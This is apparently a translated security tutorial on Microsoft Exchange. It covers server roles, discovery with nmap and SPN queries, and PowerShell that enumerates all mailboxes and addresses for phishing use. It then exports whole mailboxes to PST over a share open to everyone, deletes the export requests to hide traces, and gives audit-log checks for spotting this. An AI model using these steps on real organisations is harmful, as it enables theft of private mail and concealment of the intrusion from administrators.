By dividing the system into different server roles (each of which runs its own components and services) and setting dependencies between these roles, Exchange turns e-mail processing into a powerful, rich, stable and complex process. Exchange is logically divided into three layers: the network layer (Network Layer), the directory layer (Directory Layer) and the messaging layer (Messaging Layer). The server roles sit in the messaging layer.
Taking Exchange Server 2010 as an example, there are five server roles: Mailbox server, Client Access server, Hub Transport server, Unified Messaging server and Edge Transport server. All roles except the Edge Transport server can be deployed on the same host. The Mailbox server, Client Access server and Hub Transport server are the core server roles; deploying these three is enough to provide basic e-mail processing.
- Mailbox server (Mailbox Server): the back-end component that hosts mailboxes, public folders and related message data (for example address lists). This is a required server role.
- Client Access server (Client Access Server): the server role that receives and processes requests from different clients, supporting access over different protocols. At least one Client Access server must be deployed in an Exchange environment.
- Hub Transport server (Hub Transport Server): also called the central transport server. Its core service is Microsoft Exchange Transport, which handles mail flow (Exchange administrators configure outbound and inbound mail through mail flow), routes mail, and delivers it within the Exchange organization. This server role processes all messages sent to local and external mailboxes, ensures that sender and recipient addresses are resolved correctly, and enforces specific policies (for example address filtering, content filtering, format conversion); it can also log, audit, add disclaimers and so on. As the name "Hub Transport" suggests, this role is the relay station for mail transport. At least one Hub Transport server must be deployed in an Exchange environment.
- Unified Messaging server (Unified Messaging Server): integrates the private branch exchange (Private Branch Exchange, PBX) with the Exchange server, allowing users to send and store voice and fax messages by mail. This server role is optional.
- Edge Transport server (Edge Transport Server): a dedicated server for routing mail to internal or external destinations, usually deployed at the network boundary as a security boundary. This role receives messages from the internal organization and from trusted external servers, applies specific anti-spam and anti-virus policies to them, and routes the messages that pass the policies to the internal Hub Transport server. This server role is optional.
2. Client/remote access interfaces and protocols
E-mail communication is generally divided into two processes, sending and receiving. Sending uses one common protocol, SMTP (Simple Mail Transfer Protocol). Receiving uses several protocol standards, for example POP3, which developed from POP (Post Office Protocol), and the widely used IMAP (Internet Message Access Protocol). Exchange also has its own proprietary protocol, MAPI, and newer versions of Outlook usually use MAPI to interact with Exchange. In addition, early versions of Outlook used RPC over HTTP, known as "Outlook Anywhere".
The access interfaces and protocols supported by Exchange are listed below.
- OWA (Outlook Web App): the web mailbox provided by Exchange.
- EAC (Exchange Administrative Center): the Exchange management center, the web console for Exchange in the organization.
- Outlook Anywhere (RPC-over-HTTP, RPC/HTTP).
- MAPI (MAPI-over-HTTP, MAPI/HTTP).
- Exchange ActiveSync (EAS, XML/HTTP).
- Exchange Web Services (EWS, SOAP-over-HTTP).
Exchange Service discovery
1. Discovery based on port scanning
Exchange is an application that runs on a computer system and provides services to users, so it must open the corresponding ports (so that its multiple services and functional components can depend on and coordinate with each other). Exchange servers on the intranet or on the public network can therefore be found by port scanning.
Because the specific open ports and services depend on the server role, in this section's experiment Nmap is used for port scanning, and the role is confirmed from the scan result:
nmap -A -O -sV 192.168.0.100
Finding Exchange servers with Nmap port scanning requires interaction with the host, generates a lot of traffic, causes IDS alerts, and leaves a large number of logs on the target server. Paying attention to alert information and checking logs frequently therefore reveals anomalies in the network.
2. SPN query
When Exchange is installed, its SPNs are registered in Active Directory, so in a domain environment the Exchange service can be discovered through SPNs. There are many ways to obtain SPN records: a PowerShell script can be used, or the setspn.exe that ships with Windows. Enter and run the following command:
setspn -T labtest.com -F -Q */*
Exchange basic operations
Since Exchange is an e-mail system, it must have a database. Exchange database files have the extension ".edb" and are stored on the Exchange server. Mail sent, received and stored through Exchange is kept in the Exchange database. To ensure availability, Exchange usually runs on two or more servers. The database information can be viewed with PowerShell.
1. Check the mail database.
2. Get the e-mail addresses of existing users: use a PowerShell query to list all Exchange users and their e-mail addresses.
3. View the mailbox usage information of a specified user.
4. Get the number of messages in a user's mailbox.
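The four operations above, as an added example that is not part of the original notes: Exchange cmdlets exist only inside the Exchange Management Shell or a remote PowerShell session to an Exchange server, so the example opens such a session first. The server name, domain and mailbox name are hypothetical.

```powershell
# Added example, not from the original notes. Server, domain and mailbox
# names are hypothetical; the session needs an account with Exchange rights.
$exch = 'exch01.labtest.com'
$s = New-PSSession -ConfigurationName Microsoft.Exchange `
        -ConnectionUri "http://$exch/PowerShell/" -Authentication Kerberos
Import-PSSession $s -DisableNameChecking | Out-Null

# 1. Mailbox databases: which server holds them, where the .edb file lives,
#    and whether the database is mounted
Get-MailboxDatabase -Status |
    Format-Table Name, Server, EdbFilePath, DatabaseSize, Mounted -AutoSize

# 2. Every mailbox with its primary SMTP address; this is the internal
#    address book an attacker wants for phishing or password spraying,
#    so it is written out to a file for later use
Get-Mailbox -ResultSize Unlimited |
    Select-Object Name, SamAccountName, PrimarySmtpAddress, Database |
    Export-Csv -Path .\mailboxes.csv -NoTypeInformation

# 3. Usage of one mailbox: size, item count and who last logged on to it
Get-MailboxStatistics -Identity 'administrator' |
    Format-List DisplayName, ItemCount, TotalItemSize, LastLogonTime, LastLoggedOnUserAccount

# 4. Message count per folder, largest first. The folder names shown here
#    (Inbox, SentItems, DeletedItems, Drafts) are the ones used when only
#    part of a mailbox is exported.
Get-MailboxFolderStatistics -Identity 'administrator' |
    Where-Object { $_.ItemsInFolder -gt 0 } |
    Sort-Object ItemsInFolder -Descending |
    Format-Table Name, FolderPath, ItemsInFolder, FolderSize -AutoSize

Remove-PSSession $s
```

`Get-Mailbox` and `Get-MailboxStatistics` are read-only cmdlets and are not written to the Exchange admin audit log, so this enumeration is quiet from the server's point of view; the remote PowerShell connection itself, however, is logged on the Client Access server's IIS `/PowerShell` virtual directory.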
Export the specified email
Exported Exchange mail has the extension ".pst". In Exchange 2007, mail is exported with the Export-Mailbox command. From Exchange 2010 SP1 onward, either the graphical interface or PowerShell can be used. To export mail as a PST file, the user running PowerShell must be granted mailbox import/export permission.
1. Configure the user's import/export permission (the new permission takes effect only after the Exchange Management Shell session is restarted).
2. Set up a network shared folder.
Whichever way mail is exported, the file must be placed under a UNC (Universal Naming Convention) path. Network paths of the form "\\hostname\sharename" or "\\ip_address\sharename" are UNC paths, where sharename is the name of the network share. Sharing must first be enabled. In this experiment, the C:\inetpub folder is shared with permissions that allow any user to operate on it, so that mail can be exported from the Exchange server.
3. Export the user's e-mail.
(1) Using PowerShell. The folders of an exported mailbox are generally Inbox, SentItems (sent mail), DeletedItems (deleted mail), Drafts, and so on.
With the New-MailboxExportRequest command, all messages of a specified user can be exported.
(2) Export e-mail through the graphical interface.
4. Manage export requests.
Whether mail is exported with PowerShell or through the graphical interface, creating the export leaves related information in Exchange, and this information helps the Exchange administrator find abnormal behavior on the server.
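The whole export procedure (permission, share, export, request management), as an added example that is not part of the original notes, followed by what the administrator can still see afterwards. Server, share, user and folder names are hypothetical; the commands are meant for the Exchange Management Shell on the server.

```powershell
# Added example, not from the original notes. All names are hypothetical.
$shareDir = 'C:\inetpub\export'                   # local folder backing the share
$unc      = '\\exch01.labtest.com\export'          # export path must be UNC
$target   = 'administrator'                        # mailbox to export
$operator = 'labtest\opadmin'                      # account that runs the export

# 1. Grant import/export permission. The assignment is read when the shell
#    connects, so reopen the Exchange Management Shell before step 3.
New-ManagementRoleAssignment -Role 'Mailbox Import Export' -User $operator

# 2. Create the share. The PST is written by the Mailbox Replication Service
#    running as the Exchange server's computer account, which needs write
#    access; 'Everyone' matches the notes and is what a defender should look for.
New-Item -ItemType Directory -Path $shareDir -Force | Out-Null
New-SmbShare -Name 'export' -Path $shareDir -FullAccess 'Everyone'

# 3. Export the whole mailbox, and separately only Inbox + SentItems
#    (#Folder# is the well-known-folder notation used by -IncludeFolders).
New-MailboxExportRequest -Mailbox $target -FilePath "$unc\$target.pst" -Name "export-$target"
New-MailboxExportRequest -Mailbox $target -IncludeFolders '#Inbox#', '#SentItems#' `
    -FilePath "$unc\$target-inbox-sent.pst" -Name "export-$target-partial"

# 4. Track progress; requests stay listed until removed
Get-MailboxExportRequest | Get-MailboxExportRequestStatistics |
    Format-Table Name, SourceAlias, Status, PercentComplete, FilePath -AutoSize
# An intruder removes completed requests so Get-MailboxExportRequest no
# longer shows them...
Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false

# ...but the admin audit log still records who ran the export and the role
# assignment, and when. This is the check an administrator should run.
Search-AdminAuditLog -StartDate (Get-Date).AddDays(-30) `
    -Cmdlets New-MailboxExportRequest, New-ManagementRoleAssignment, Remove-MailboxExportRequest |
    Select-Object RunDate, Caller, CmdletName, ObjectModified |
    Sort-Object RunDate -Descending
```

Two things in this trail are hard for an attacker to erase without further privileges: the "Mailbox Import Export" role assignment, which is rarely granted in normal operation and can be reviewed with `Get-ManagementRoleAssignment -Role 'Mailbox Import Export'`, and the admin audit log entries, which are stored in an arbitration mailbox rather than in the request objects that `Remove-MailboxExportRequest` deletes.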